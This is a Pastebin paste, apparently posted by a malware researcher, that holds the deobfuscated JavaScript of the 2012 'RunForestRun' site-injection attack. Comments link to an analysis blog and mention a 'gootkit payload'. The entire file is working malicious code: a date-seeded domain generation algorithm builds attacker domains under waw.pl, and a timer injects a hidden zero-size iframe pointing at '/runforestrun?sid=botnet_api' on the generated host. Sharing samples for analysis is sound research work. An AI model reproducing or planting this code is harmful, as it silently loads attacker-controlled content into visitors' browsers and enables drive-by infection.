daily pastebin goal
42%
SHARE
TWEET

Untitled

a guest Jul 26th, 2012 364 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /* New domain name generating algorithm used by the "botnet_api"
  2.    version of the RunForestRun attack described here:
  3.    http://blog.UnmaskParasites.com/2012/07/26/runforestrun-now-encrypts-legitimate-js-files
  4.    ============================================================== */
  5.  
  6. //Congratulations! you have successfully extracted the gootkit payload
  7. //this means i must work hardly :(
  8.  
  9.  
  10. function nextRandomNumber() {
  11.         var hi = this.seed / this.Q;
  12.         var lo = this.seed % this.Q;
  13.         var test = this.A * lo - this.R * hi;
  14.         if (test > 0) {
  15.                 this.seed = test;
  16.         } else {
  17.                 this.seed = test + this.M;
  18.         }
  19.         return (this.seed * this.oneOverM);
  20. }
  21.  
  22. function RandomNumberGenerator(unix) {
  23.         var d = new Date(unix * 1000);
  24.         var s = Math.ceil(d.getHours() / 6);
  25.         this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
  26.         this.A = 48271;
  27.         this.M = 2147483647;
  28.         this.Q = this.M / this.A;
  29.         this.R = this.M % this.A;
  30.         this.oneOverM = 1.0 / this.M;
  31.         this.next = nextRandomNumber;
  32.         return this;
  33. }
  34.  
  35. function createRandomNumber(r, Min, Max) {
  36.         return Math.round((Max - Min) * r.next() + Min);
  37. }
  38.  
  39. function generatePseudoRandomString(unix, length, zone) {
  40.         var rand = new RandomNumberGenerator(unix);
  41.         var subdomainlen = Math.floor(Math.random() * 32);
  42.         var letters = "huozfexmrufmqhgnsvkehzrfrqoplpvbuaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
  43.         var str = '';
  44.         for (var i = 0; i < subdomainlen; i++) {
  45.                 str += letters[Math.floor(Math.random() * (letters.length - 1))];
  46.         }
  47.         str += '.'
  48.         for (var i = 0; i < length; i++) {
  49.                 str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  50.         }
  51.         return str + '.' + zone;
  52. }
  53.  
  54. setTimeout(function() {
  55.         try {
  56.                 if (typeof iframeWasCreated == "undefined") {
  57.                         iframeWasCreated = true;
  58.                         var unix = Math.round(+new Date() / 1000);
  59.                         var domainName = generatePseudoRandomString(unix, 16, 'waw.pl');
  60.                         ifrm = document.createElement("IFRAME");
  61.                         ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet_api");
  62.                         ifrm.style.width = "0px";
  63.                         ifrm.style.height = "0px";
  64.                         ifrm.style.visibility = "hidden";
  65.                         document.body.appendChild(ifrm);
  66.                 }
  67.         } catch (e) {}
  68. }, 500);
RAW Paste Data
Top